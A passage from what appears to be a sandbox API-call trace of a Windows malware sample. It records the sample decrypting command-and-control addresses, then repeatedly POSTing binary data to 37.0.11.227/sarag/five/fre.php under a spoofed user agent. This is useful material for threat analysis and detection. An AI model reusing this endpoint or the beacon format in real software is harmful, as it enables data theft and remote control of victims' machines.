Flags=0x0, Size=0x201b) returned 0x6b57a0 [0214.536] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.537] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.537] GetProcessHeap () returned 0x690000 [0214.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0214.537] GetProcessHeap () returned 0x690000 [0214.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.538] GetProcessHeap () returned 0x690000 [0214.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0214.538] GetProcessHeap () returned 0x690000 [0214.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0214.539] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.539] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.539] GetProcessHeap () returned 0x690000 [0214.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0214.540] GetProcessHeap () returned 0x690000 [0214.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.540] send (s=0x514, buf=0x6ab500*, len=242, flags=0) returned 242 [0214.541] send (s=0x514, buf=0x6aba40*, len=159, flags=0) returned 159 [0214.541] GetProcessHeap () returned 0x690000 [0214.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0214.541] recv (in: s=0x514, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0214.605] GetProcessHeap () returned 0x690000 [0214.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0214.605] GetProcessHeap () returned 0x690000 [0214.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0214.609] GetProcessHeap () returned 0x690000 [0214.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0214.609] GetProcessHeap () returned 0x690000 [0214.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0214.610] closesocket (s=0x514) returned 0 [0214.611] GetProcessHeap () returned 0x690000 [0214.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0214.611] GetProcessHeap () returned 0x690000 [0214.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0214.611] GetProcessHeap () returned 0x690000 [0214.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0214.612] GetProcessHeap () returned 0x690000 [0214.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0214.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6d8) returned 0x514 [0214.614] Sleep (dwMilliseconds=0xea60) [0214.616] GetProcessHeap () returned 0x690000 [0214.616] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0214.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.627] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0214.635] GetProcessHeap () returned 0x690000 [0214.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0214.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.636] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0214.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.637] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.638] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.638] GetProcessHeap () returned 0x690000 [0214.639] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0214.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.640] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0214.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.644] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0214.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.645] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0214.645] GetProcessHeap () returned 0x690000 [0214.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0214.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.646] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.647] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.656] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.657] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.657] GetProcessHeap () returned 0x690000 [0214.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0214.657] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.658] GetProcessHeap () returned 0x690000 [0214.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0214.659] GetProcessHeap () returned 0x690000 [0214.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0214.659] GetProcessHeap () returned 0x690000 [0214.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0214.660] GetProcessHeap () returned 0x690000 [0214.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0214.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.661] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.667] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0214.676] GetProcessHeap () returned 0x690000 [0214.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0214.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.677] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0214.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.679] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.680] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.680] GetProcessHeap () returned 0x690000 [0214.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0214.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.682] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0214.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.686] CryptDestroyKey (hKey=0x69d628) returned 1 [0214.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.687] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0214.687] GetProcessHeap () returned 0x690000 [0214.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0214.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.700] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0214.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.704] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0214.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.706] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0214.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.707] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0214.707] GetProcessHeap () returned 0x690000 [0214.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0214.708] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0214.708] GetProcessHeap () returned 0x690000 [0214.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0214.708] socket (af=2, type=1, protocol=6) returned 0x518 [0214.708] connect (s=0x518, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0214.734] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0214.734] GetProcessHeap () returned 0x690000 [0214.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0214.735] GetProcessHeap () returned 0x690000 [0214.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0214.735] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.736] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.736] GetProcessHeap () returned 0x690000 [0214.736] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0214.736] GetProcessHeap () returned 0x690000 [0214.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.737] GetProcessHeap () returned 0x690000 [0214.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0214.737] GetProcessHeap () returned 0x690000 [0214.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0214.737] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.738] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.738] GetProcessHeap () returned 0x690000 [0214.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0214.738] GetProcessHeap () returned 0x690000 [0214.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.739] send (s=0x518, buf=0x6ad508*, len=242, flags=0) returned 242 [0214.739] send (s=0x518, buf=0x6aba40*, len=159, flags=0) returned 159 [0214.739] GetProcessHeap () returned 0x690000 [0214.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0214.739] recv (in: s=0x518, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0214.817] GetProcessHeap () returned 0x690000 [0214.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0214.817] GetProcessHeap () returned 0x690000 [0214.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0214.818] GetProcessHeap () returned 0x690000 [0214.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0214.818] GetProcessHeap () returned 0x690000 [0214.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0214.819] closesocket (s=0x518) returned 0 [0214.819] GetProcessHeap () returned 0x690000 [0214.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0214.819] GetProcessHeap () returned 0x690000 [0214.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0214.822] GetProcessHeap () returned 0x690000 [0214.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0214.822] GetProcessHeap () returned 0x690000 [0214.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0214.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18c) returned 0x518 [0214.826] Sleep (dwMilliseconds=0xea60) [0214.827] GetProcessHeap () returned 0x690000 [0214.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0214.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.838] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0214.845] GetProcessHeap () returned 0x690000 [0214.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0214.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.846] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0214.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.846] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.847] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.847] GetProcessHeap () returned 0x690000 [0214.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0214.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.853] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0214.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.854] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0214.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.855] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0214.855] GetProcessHeap () returned 0x690000 [0214.855] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0214.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.856] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.857] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.858] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.859] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.865] GetProcessHeap () returned 0x690000 [0214.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0214.866] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.866] GetProcessHeap () returned 0x690000 [0214.866] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0214.867] GetProcessHeap () returned 0x690000 [0214.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0214.867] GetProcessHeap () returned 0x690000 [0214.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0214.867] GetProcessHeap () returned 0x690000 [0214.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0214.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0214.889] GetProcessHeap () returned 0x690000 [0214.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0214.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.890] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0214.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.891] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.891] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.891] GetProcessHeap () returned 0x690000 [0214.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0214.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.893] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0214.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.894] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0214.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0214.894] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0214.894] GetProcessHeap () returned 0x690000 [0214.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0214.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.895] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0214.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.896] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0214.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.897] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0214.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.900] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0214.900] GetProcessHeap () returned 0x690000 [0214.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0214.900] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0214.900] GetProcessHeap () returned 0x690000 [0214.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0214.900] socket (af=2, type=1, protocol=6) returned 0x51c [0214.903] connect (s=0x51c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0214.940] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0214.940] GetProcessHeap () returned 0x690000 [0214.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0214.941] GetProcessHeap () returned 0x690000 [0214.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0214.941] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.944] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.944] GetProcessHeap () returned 0x690000 [0214.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0214.944] GetProcessHeap () returned 0x690000 [0214.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0214.945] GetProcessHeap () returned 0x690000 [0214.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0214.945] GetProcessHeap () returned 0x690000 [0214.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0214.946] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0214.948] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: 